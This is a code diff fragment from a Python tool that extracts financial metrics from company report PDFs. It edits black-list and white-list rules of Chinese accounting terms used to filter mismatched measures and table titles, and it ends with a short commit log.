                   ,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
                   ,'期扣非加权平均净资产收益率:同比,年化,每股'
                   ,'加权平均净资产收益率同比变动:年化,每股'
-                   ,'研发费用:制造,投入,直接,管理','应收账款:1-2年','货币资金:在途'
+                   ,'研发费用:制造,投入,直接,管理'
-                   ,'当期:2023年1-6月,调整后','营业成本:营业总成本','长期借债:年内到期','研发投入:直接'
+                   ,'应收账款:1-2年','货币资金:在途'
-                   ,'第一季度:第二季度,第三季度,第四季度','第二季度:第一季度,第三季度,第四季度','第三季度:第二季度,第一季度,第四季度','第四季度:第二季度,第三季度,第一季度'
+                   ,'当期:2023年1-6月,调整后'
-                   ,'研发费用:研发支出,研发投入','存货:跌价准备','费用:日常,付现','固定资产:改良,补助,投资']
+                   ,'营业成本:营业总成本'
                   ,'长期借债:年内到期','研发投入:直接'
                   ,'第一季度:第二季度,第三季度,第四季度'
                   ,'第二季度:第一季度,第三季度,第四季度'
                   ,'第三季度:第二季度,第一季度,第四季度'
                   ,'第四季度:第二季度,第三季度,第一季度'
                   ,'研发费用:研发支出,研发投入','存货:跌价准备'
                   ,'费用:日常,付现','固定资产:改良,补助,投资']
    # current_period = f'当期:{report_year}年1-6月'
    # black_array.append(current_period)
    for black in black_array:
@ -303,12 +342,13 @@ def check_black_list_old(meta_measure,pdf_measure):
                if pdf_measure.find(pdf) >= 0:
                    return True
    return False
 def check_white_list(meta_measure,pdf_measure):
-    white_array = ['基本每股收益:每股收益', '加权平均净资产收益率同比变动:比', '季度变动比例:比', '加权平均净资产收益率:比']
+    white_array = ['基本每股收益:每股收益','加权平均净资产收益率同比变动:比','季度变动比例:比']
    for black in white_array:
        black_meta = black.split(':')[0]
        black_pdfs = black.split(':')[1].split(',')
-        if meta_measure.find(black_meta) >= 0:
+        if black_meta in meta_measure:
            for pdf in black_pdfs:
                if pdf_measure.find(pdf) < 0:
                    return True
@ -384,7 +424,7 @@ def check_table_title_black_list_measure(text):
    #black_array = ['补充资料:研发费用,管理费用,财务费用'
                #    ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
                   #]
-    table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产"""
+    table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产|计息金融工具|坏账准备"""
    if len(re.findall(table_title_black_list, text)) > 0:
        return True
    return False
@ -493,6 +533,8 @@ def check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,co
                   ,'持有待售资产:固定资产'
                   ,'账龄超过 1 年或逾期的重要应付账款:应付账款'
                   ,'经营租赁资产:固定资产'
                   ,'计息金融工具:货币资金,短期借款,交易性金融资产'
                   ,'坏账准备:应收账款'
                   ]
    for black in black_array:
        black_meta = black.split(':')[0]
@ -514,6 +556,7 @@ def check_black_table_list(data):
            black_meta = black.split(':')[0]
            black_pdfs = black.split(':')[1].split(',')
            if any(black_meta in cell for row in data for cell in row):
                print(data)
                for pdf in black_pdfs:
                    data = [row for row in data if not any(pdf in cell for cell in row)]
    return data
Author	SHA1	Message	Date
yeshu	edbcc245a6	feat: 导入全新的项目代码	2025-08-20 09:49:07 +08:00
yeshu	24764099c4	feat: 清理工作区，为导入新代码做准备	2025-08-20 09:46:46 +08:00